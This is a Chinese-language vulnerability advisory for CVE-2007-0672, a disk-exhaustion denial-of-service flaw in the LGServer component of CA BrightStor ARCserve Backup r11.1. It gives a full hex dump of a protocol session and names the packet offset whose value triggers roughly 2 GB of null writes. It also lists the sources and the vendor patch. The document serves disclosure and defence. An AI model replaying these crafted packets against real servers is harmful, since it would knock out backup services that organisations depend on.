安全研究
安全漏洞
CA BrightStor ARCServe BackUp LGServer资源耗尽漏洞
发布日期:2007-01-11
更新日期:2007-02-01
受影响系统:
Computer Associates BrightStor ARCserve Backup for Laptops & Desktops r11.1描述:
BUGTRAQ ID: 22339
CVE ID: CVE-2007-0672
BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。
BrightStor ARCserve Backup在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞导致服务器消耗大量磁盘资源。
每次用户试图验证到LGSERVER.EXE都会在D:\CA_BABLDdata\Server\data\transfer中创建一个文件。该文件扩展名为.USX,格式类似于RWXXX.usx,其中X为0-9或A-F的值。
在协商期间16进制地址(DWORD)0x15到0x18上的第三个报文中值为0x00 0x00 0x00 0x00,然后是CoreDataDB。如果发送了这个报文,就会将上述内容写入到这个USX文件。但如果在0x15到0x18地址所传送的DWORD值为0xff 0xff 0xff 0x7f,就会向USX文件中写入额外2,096,153KB的NULL,导致拒绝服务。
以下为会话示例:
客户端报文1
Raw Data
4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, )
00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 ( )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
客户端报文2
Raw Data
4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00 (N=, )
06 00 00 00 ce 03 00 00 52 57 31 42 34 00 ( RW1B4 )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
客户端报文3
Raw Data
4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00 (N=, )
ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61 ( CoreData)
44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00 (DB )
00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00 ( J )
00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( J )
00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00 ( J P )
00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00 ( )
00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00 ( B )
00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00 ( N )
00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00 ( b )
00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00 ( f )
00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00 ( x )
00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00 ( | )
00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00 ( )
00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00 ( )
00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ( )
00 00 01 00 00 00 03 00 00 00 f0 b4 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 01 00 00 00 04 00 00 00 06 00 43 6f 6e 66 ( Conf)
69 67 06 00 00 00 05 00 00 00 29 9f 07 00 00 00 (ig ) )
12 92 09 00 00 00 1f 9b 0b 00 00 00 57 92 0d 00 ( W )
00 00 b6 ad 0f 00 00 00 72 9c 00 00 00 00 00 00 ( r )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 03 00 00 00 06 00 00 00 08 00 55 73 65 72 ( User)
4e 61 6d 65 00 00 00 00 00 00 00 00 00 00 00 00 (Name )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 6d 61 72 6b 03 00 00 00 08 00 00 00 ( mark )
08 00 50 61 73 73 77 6f 72 64 00 00 00 00 00 00 ( Password )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 6a 86 fb b5 8d 2b ( j +)
1b a4 40 e1 b6 73 03 00 00 00 0a 00 00 00 0a 00 ( @ s )
55 73 65 72 53 74 61 74 75 73 11 00 00 00 03 00 (UserStatus )
00 00 0c 00 00 00 08 00 43 6f 64 65 50 61 67 65 ( CodePage)
e4 04 00 00 03 00 00 00 0e 00 00 00 04 00 48 6f ( Ho)
73 74 67 73 72 6c 2d 74 65 73 74 2e 67 73 72 6c (stgsrl-test.gsrl)
2d 74 65 73 74 2e 6e 65 74 03 00 00 00 10 00 00 (-test.net )
00 07 00 56 65 72 73 69 6f 6e 31 31 2e 31 2e 37 ( Version11.1.7)
34 32 3a 57 69 6e 64 6f 77 73 20 53 65 72 76 65 (42:Windows Serve)
72 20 32 30 30 33 (r 2003)
客户端报文4
Raw Data
4e 3d 2c 1b 00 00 00 00 04 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
<*来源:Mark Litchfield (mark@ngssoftware.com)
John Heasman (nisr@nextgenss[.]com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=117026398718737&w=2
http://secunia.com/advisories/23897/
*>
建议:
厂商补丁:
Computer Associates
-------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp
浏览次数:2833
严重程度:0(网友投票)
绿盟科技给您安全的保障